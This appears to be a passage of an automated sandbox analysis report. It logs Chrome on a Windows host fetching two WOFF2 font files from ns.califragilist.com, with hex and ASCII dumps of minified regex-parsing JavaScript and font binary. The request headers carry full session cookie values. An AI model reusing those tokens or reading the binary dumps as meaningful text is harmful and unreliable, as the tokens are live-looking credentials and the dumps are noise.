                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                                                                                                              Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                                                                                                              Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                                                                                                              Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                                                                                                              2024-11-06 15:56:01 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                                                                                                              Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              68192.168.2.1849838188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:00 UTC1303OUTGET /GDSherpa-vf.woff2 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:01 UTC1111INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:01 GMT
                                                                                                                                              Content-Type: font/woff2
                                                                                                                                              Content-Length: 43596
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="GDSherpa-vf.woff2"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 15:48:28 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lCadOemsNzaFvwbaLfoMkgqKnQsQnQbYCoNA%2BvBN9AYYatAtTDasWSNlFqN6rgcwJ%2Bz%2FNFQLDdOCiFEJK3tmhoP6raZQkc6cx5B3aGF5YjYN%2FGvFnh1AgzZSmWIB8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3697&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2273&delivery_rate=779332&cwnd=251&unsent_bytes=0&cid=e221ede930108295&ts=49&x=0"
                                                                                                                                              CF-Cache-Status: EXPIRED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6456a6d340c2b-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1426&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1881&delivery_rate=2052445&cwnd=247&unsent_bytes=0&cid=cf011de061f51619&ts=681&x=0"
                                                                                                                                              2024-11-06 15:56:01 UTC258INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                                                                                                              Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 78 9e 9a 82 8b e1 e3 29 f6 84 63 bf 87 74 85 01 a3 6b 16 0e 86 39 ba 09 6f 1e 54 89 f1 52 39 d1 f2 8a 9e 6b 71 93 de 54 52 25 55 f2 d4 76 a3 f6 f9 a5 72 13 5f 92 92 e2 c3 0a 13 44 ba fc 14 66 b2 84 3d 71 48 da a1 bc c4 38 df 90 3c af 1d 07 78 08 c2 28 56 98 49 b2 68 94 4c 33 2a 23 5d 38 89 e2 09 2d 94 7a 94 9c df 03 ae e5 f7 8f 17 33 91 39 56 c4 93 99 be b4 14 f9 8b 98 1e c3 96 75 bf 15 1a a7 e4 0e ea f3 ed 78 b2 b6 f2 cb fa 53 5f ea 1d ff 5c 31 f0 f2 8c ca 26 36 ed e1 bc bc ff 6a 5e da 03 c4 63 3b 28 29 6d c4 4a 9d f5 c4 17 02 3e af fa aa 97 78 7a b0 ea 59 a2 bf ed 7c c8 37 9e 00 9c e8 05 95 21 9c 6a 77 02 b6 80 2c c9 b6 4c 14 3b 4e e2 00 bb b0 a4 c4 c3 6e fb 8c 1e 00 92 a5 5d 9f 98 ba 7f de 38 5d 99 52 8e 03 64 d9 d2 10 cc ad db 60 d0 a3 52 da a2 42 18
                                                                                                                                              Data Ascii: x)ctk9oTR9kqTR%Uvr_Df=qH8<x(VIhL3*#]8-z39VuxS_\1&6j^c;()mJ>xzY|7!jw,L;Nn]8]Rd`RB
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: a4 3e ee be f6 9b 95 04 2c 60 ba e4 bf 52 71 1e dd 2a 54 ea 34 59 ab a2 82 d2 3a 27 10 31 3a 48 2b 34 e8 5e c7 7b bf 7b c8 65 ff 42 cf bd bd ab ef b8 b2 97 ef 69 4a a4 41 10 31 c6 50 bb 1f be 4e e2 cd 9b d1 0b fa 4b 4f a4 c1 39 b1 d6 36 7e db fb f5 cd a9 82 cc dd 47 43 9a 20 e1 12 24 14 22 52 b8 85 38 22 8e a4 7b 76 f7 f3 d9 17 d6 f7 fc fe f9 d7 29 e7 7b 98 f3 bc db 98 3b b6 aa aa a8 aa a8 88 25 a2 ea 3b df 32 94 7c ed 9f f6 6c ef 21 73 f4 4a bb bb 26 84 c1 18 21 1e e6 21 84 0f 9b 2b 82 1a 77 af 35 6c 48 69 09 35 4a 24 75 82 dc 7e f1 b2 cd 6a 29 3d 11 8f 92 dd 10 05 7f bc 6f 86 94 ab 21 28 0f 87 be 27 08 80 be f0 01 b4 00 b6 00 bc 3f e0 3b 41 40 3e 6f 14 00 76 06 03 12 00 02 d7 d6 ec 9c 1f 01 04 00 4e c1 f5 bf 6b 0e 56 c8 33 05 86 58 2d 52 24 82 8c eb 33
                                                                                                                                              Data Ascii: >,`Rq*T4Y:'1:H+4^{{eBiJA1PNKO96~GC $"R8"{v){;%;2|l!sJ&!!+w5lHi5J$u~j)=o!('?;A@>ovNkV3X-R$3
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 99 97 7c 2c fd 27 61 c8 ae 40 18 e6 df aa 18 25 6e 94 42 80 07 20 2d 08 b1 93 c5 85 92 ca 74 24 c9 29 cb 80 39 2f 50 9a 2f 68 40 1a 7d 11 88 e5 e3 a4 75 80 dc c4 20 d0 83 46 5b 06 ed d9 92 51 34 05 42 e1 1d 06 d4 cc 4f a7 f3 a8 86 14 ca 37 c2 01 b0 1d 64 67 70 c8 e6 3d 82 39 11 ef 09 cd e3 90 81 38 bc 6e d5 36 b0 30 b7 3e 73 33 bc 8a 90 c1 04 4a dc 88 5d 38 67 02 e8 f9 c8 ee e9 ce ef 51 a3 39 c0 26 c4 d8 a7 93 2b e3 36 6f b5 c5 68 7d 8c 94 c3 4b e0 ec cc 9d d2 67 95 c6 4a 2e 43 fd 67 14 df 88 78 3e 8e cb 57 e9 89 c3 1f 96 b3 87 8b 11 33 06 11 34 6b 22 26 55 c5 d6 a2 ea 59 69 82 11 80 6c b8 40 0c 1a 2b 21 c0 34 cb 4f c3 5e 14 b3 32 93 c8 40 d7 43 45 ea e8 a4 ce 03 4b dc a5 a7 71 8f 92 53 f5 24 51 09 0b 11 a6 78 fa 59 94 18 84 5e a0 53 42 c5 0c 7f 67 85 8e
                                                                                                                                              Data Ascii: |,'a@%nB -t$)9/P/h@}u F[Q4BO7dgp=98n60>s3J]8gQ9&+6oh}KgJ.Cgx>W34k"&UYil@+!4O^2@CEKqS$QxY^SBg
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 7b bd 96 31 a6 4d de a7 62 9b cc 63 9d c6 f1 2f 34 7d 54 e7 b4 4d c7 fa 6c 99 5d 33 da 4c 77 c2 3a 92 a4 64 ed 0b e8 55 62 22 33 fc bb a8 df cf da 1f 54 fe 3f df c2 9f fa 55 eb f3 2f fb 3f 6b 42 80 e6 dc c4 5f d1 c9 e3 66 b4 c7 ea be 1d ac ee 83 8e 1b 6e 8e ad e6 bf 68 8b 30 29 a2 ef ac 6e fe 44 d0 f2 a5 17 56 22 31 26 d0 d2 6d a3 bb 17 9d 73 39 f5 89 d5 38 e0 ef 35 50 6a bd d3 68 98 1c 7f 67 c2 aa e8 a1 96 8b d8 a4 bd 9e 7c 39 3f 4f c8 a7 12 23 ec ed 11 e2 58 6c 9b 9a a1 7a 4c a7 11 3d 93 cb 1a 4c d6 56 ca 7b d7 cc 70 24 8f 19 f8 91 9b ae b0 2b 74 9c 0d c7 6e 45 bd ad 63 20 b9 63 fa 91 b3 d4 3e 10 b3 8c 0f 08 47 58 59 8d ba 5b 7a 40 51 55 89 81 6f fb 5a 37 94 ea e8 52 6b 90 50 a5 d4 62 cb 71 4c f4 8c 33 77 da 25 da 63 07 ad e1 de 82 b6 8e df 8f 3a 44 1f
                                                                                                                                              Data Ascii: {1Mbc/4}TMl]3Lw:dUb"3T?U/?kB_fnh0)nDV"1&ms985Pjhg|9?O#XlzL=LV{p$+tnEc c>GXY[z@QUoZ7RkPbqL3w%c:D
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: d6 7e 51 66 42 4f af b5 64 c4 77 d5 ac 8b 72 c5 c6 e8 da 2f 45 53 1b 5e 36 bf b9 57 f3 0c 9b a7 79 98 43 e9 85 ab 31 07 50 d2 b9 fc f2 4c 58 6f d0 0e 04 fe 5e 10 f2 a5 62 4a 03 ae f5 23 0e a0 dc 11 5f 81 1e 73 b5 7b 39 53 f6 0e a9 9c 61 b4 08 19 a0 37 a3 b3 d1 64 42 58 af 6d b4 58 b0 25 ed e0 2e 67 1a 38 ca 4f ab 6d c5 9d 35 42 5e 54 6b 53 6a da 0c 6e 36 4d af b5 37 f9 5c b6 40 5b 76 29 54 f2 59 8f 3d f3 a5 86 3a 75 01 84 29 72 e0 63 68 d6 c8 ba 8a 3f d4 d9 56 7c 70 6c 59 66 f4 6d 5c cc 9e a2 13 3d b5 d1 e2 c1 14 a1 a4 bd 58 c0 cd f9 49 38 5d 1b e0 c7 3e 80 db 57 d8 d0 f7 34 d5 e9 e3 ff a0 96 2a 2e ee aa 1c c5 9e 8d 4c 4a 79 6e 44 f7 4f 58 6d 9c b5 3a ef 54 f8 33 96 c7 f3 64 dd dc 30 78 f3 6e 5f b0 44 df 90 83 fa a1 8d 6e d6 7e ed 2e e3 f2 e7 40 33 3c c5
                                                                                                                                              Data Ascii: ~QfBOdwr/ES^6WyC1PLXo^bJ#_s{9Sa7dBXmX%.g8Om5B^TkSjn6M7\@[v)TY=:u)rch?V|plYfm\=XI8]>W4*.LJynDOXm:T3d0xn_Dn~.@3<
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 59 2e 77 0d f4 d4 fc 07 b6 eb 05 61 4b 8f 5a 69 5f 3f 47 81 2d dd 92 6b bd 6b 22 2b 98 d4 8f e4 e9 b1 30 e8 a1 ef f4 f7 86 b3 0e 29 d8 19 de e0 eb f9 a7 c6 a9 6c 9d 52 a2 a4 d8 95 ec 1d d9 5a e9 cf 87 7a 12 ff cf f2 c9 76 7e e8 a4 ba b1 b6 d1 ee e0 7a 6f e0 85 92 f6 20 63 59 69 56 e6 b3 2a dd e1 fb 92 29 89 1f d5 9b 49 97 d7 9b e9 9f a6 2b 09 6d e5 0d 86 58 5d fc e5 38 51 16 3b ad f1 91 74 dc 2c 3d 43 ce b0 07 c9 31 8e e0 3d 9f d5 dd 53 e1 45 a4 70 60 88 7d f4 f0 c9 ce e9 3c 80 df d7 78 30 94 d8 36 05 db e0 5a 22 20 14 60 19 dd f7 b3 b4 bd 5f 75 e5 6b a0 e7 ef 7e 7d d8 73 30 10 2c 3f 4a 0d df 7f 51 a7 a1 85 fe 76 4e 9d 30 e2 68 9e c5 ca 64 f5 22 bf ae b8 75 8b d7 7f 92 5f 9c 58 e4 11 ef e7 22 62 d7 2f 67 7b 55 b4 9a e0 f1 16 e6 d7 98 5c b4 c9 bf ae c4 d3
                                                                                                                                              Data Ascii: Y.waKZi_?G-kk"+0)lRZzv~zo cYiV*)I+mX]8Q;t,=C1=SEp`}<x06Z" `_uk~}s0,?JQvN0hd"u_X"b/g{U\
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: a6 73 dc 75 9e ee e5 63 68 f7 63 e3 75 2f 53 26 0b a9 87 9d 72 2c d1 e7 f6 b1 d4 a1 7c c2 a2 da 8a 7c 3f b9 20 fe 3a 8d 43 33 1b ab d4 f5 6d 4d c3 e2 dd 36 ee 35 62 69 95 22 f0 46 f8 d9 7a 68 37 a5 a8 21 6e b5 b2 92 5f 40 ab 16 92 96 5b e2 15 6e 46 29 46 b7 00 4f 05 6e b1 9b fa f9 5a cb 80 d9 34 ac 08 96 d6 da 40 6d 7b 3f f8 24 61 96 de 62 e5 00 a4 59 3c a2 bd a6 1e 75 01 cd 9c 00 1f 0d c7 da 08 15 91 3f d2 c4 4f 7f c1 0d 6c 0a 22 cb 59 c2 51 e4 59 52 b4 8c ef 09 b2 25 0c b9 b2 75 36 d6 a1 d6 98 53 0f e7 62 e9 dd f0 9f 66 d4 22 1b 6b 13 ea f6 c1 6d 7d 2a ba 94 7c f6 e9 dd fc 87 22 db 87 d7 e0 12 e6 4a d0 b7 e2 a7 bb 35 45 65 97 c8 02 ef fc 1e 1c 11 e5 4a 42 81 59 4a 5c 90 cb 72 51 27 c8 bb f0 bd ea a7 af 58 17 66 61 8f c3 72 2d 90 f9 82 9b 82 d7 f4 1e 6a
                                                                                                                                              Data Ascii: suchcu/S&r,||? :C3mM65bi"Fzh7!n_@[nF)FOnZ4@m{?$abY<u?Ol"YQYR%u6Sbf"km}*|"J5EeJBYJ\rQ'Xfar-j
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: fb 0a 3c f6 0f 28 19 2d 72 45 2f 9d 7c c7 ad 83 d8 2f 0d 8f 8c 1e f3 0b 28 e3 21 4d 8f fb ea 20 10 30 08 28 18 b0 44 f7 bf 00 88 20 61 11 d1 62 c4 ba f7 8a 41 c1 e1 43 42 87 c9 3d 6c 7b 81 47 00 38 11 5e 87 bf 23 b8 f0 b5 38 9c ef ea 0c ae 85 bb ad d9 82 3b e8 87 fa ef ed 3d c0 a3 eb 3f 0b b7 80 4d ef 65 b7 82 c3 97 dd 06 3e bc 8c 32 b8 6e 01 00 00 00 0d 47 0c ca 60 3c 20 d5 88 13 d9 02 c9 08 14 13 80 6e 8b 60 31 74 c6 dc 8c db d7 e9 d4 6a dc 38 9e 1a bf 1e 5f 00 01 05 55 88 89 bf ca 0c 2c 3a b7 0d 0a 83 0a d2 de 02 4a df 91 b3 2b 6d b3 43 b5 a5 48 08 52 40 cb a8 7f 90 13 46 b7 a0 cc 41 5a ff 9e 89 be 8c b4 05 1a d8 6c 4e eb 08 0e 0c 87 43 c5 8a cb 23 e7 f0 98 8c 90 eb 5e 1b 6b 1f 41 93 cc 6d 50 03 1f b4 ab a9 27 27 87 21 22 6e 5b 71 6c f5 ea 24 d2 0b 14
                                                                                                                                              Data Ascii: <(-rE/|/(!M 0(D abACB=l{G8^#8;=?Me>2nG`< n`1tj8_U,:J+mCHR@FAZlNC#^kAmP''!"n[ql$
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 20 6b 45 56 76 cd d7 7a ed d7 c7 ba aa 3b b1 b4 64 a3 7a aa 0f 66 70 46 7f 21 15 af 12 d9 74 5e ed 72 69 d8 84 35 5b ae ba 2b fa 7d 68 88 d0 99 2c 36 2d b4 e3 a4 1b 8f 95 8e bb 7f 97 86 e2 ba 5c 5f 5c df 69 51 46 4e 6c 02 f0 b1 d8 e7 2b 8e a3 a9 3f be b2 11 27 f6 00 43 55 69 d3 a5 df 48 6c 3e eb b5 05 1b 3e ba b4 16 0c 1b 33 6e 8c b6 ef fe ea b0 51 5b 67 5b ed 66 bb c5 76 da fd f6 d8 d0 81 a1 a3 43 33 b6 8e 1c 8d 18 91 60 24 d2 66 95 22 dd f3 ef ac 3b 07 1e e5 27 52 13 68 c6 e2 f5 de f1 3b 8f f0 81 ef 71 fe f1 fd 49 ba 7e 09 cf 1d a4 7f fa e7 21 f4 b6 ef 13 3a 82 ff 4c fc 0f 8e df 4c fc 77 bc e8 8d 3f ec d3 17 d9 de 8d b4 1f db ff 3e 3d 3e 48 0f 99 83 3b 84 fb bf 67 07 7b e3 d3 89 5d b2 fb d8 0d ed 9e 85 1d 5c ba 41 df 9c a5 d1 5f a0 4f 00 f8 77 07 00 14
                                                                                                                                              Data Ascii: kEVvz;dzfpF!t^ri5[+}h,6-\_\iQFNl+?'CUiHl>>3nQ[g[fvC3`$f";'Rh;qI~!:LLw?>=>H;g{]\A_Ow


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              69192.168.2.1849840188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:01 UTC1304OUTGET /GDSherpa-vf2.woff2 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:01 UTC1109INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:01 GMT
                                                                                                                                              Content-Type: font/woff2
                                                                                                                                              Content-Length: 93276
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="GDSherpa-vf2.woff2"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 15:48:28 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0ZFYexb1RAUyx86b8clvPikgUJk8YemA7nnRiwnA7sE%2FlXpqU1XntTjY6Kc0l46hTahpf4HEAK4qkDspcA2JFtwN74l4dCuivwHsDoR%2BJ6fbmo3RdRZMzN%2FcX0iWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3263&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2274&delivery_rate=870192&cwnd=251&unsent_bytes=0&cid=7e0780ec4dcbb9f7&ts=40&x=0"
                                                                                                                                              CF-Cache-Status: EXPIRED
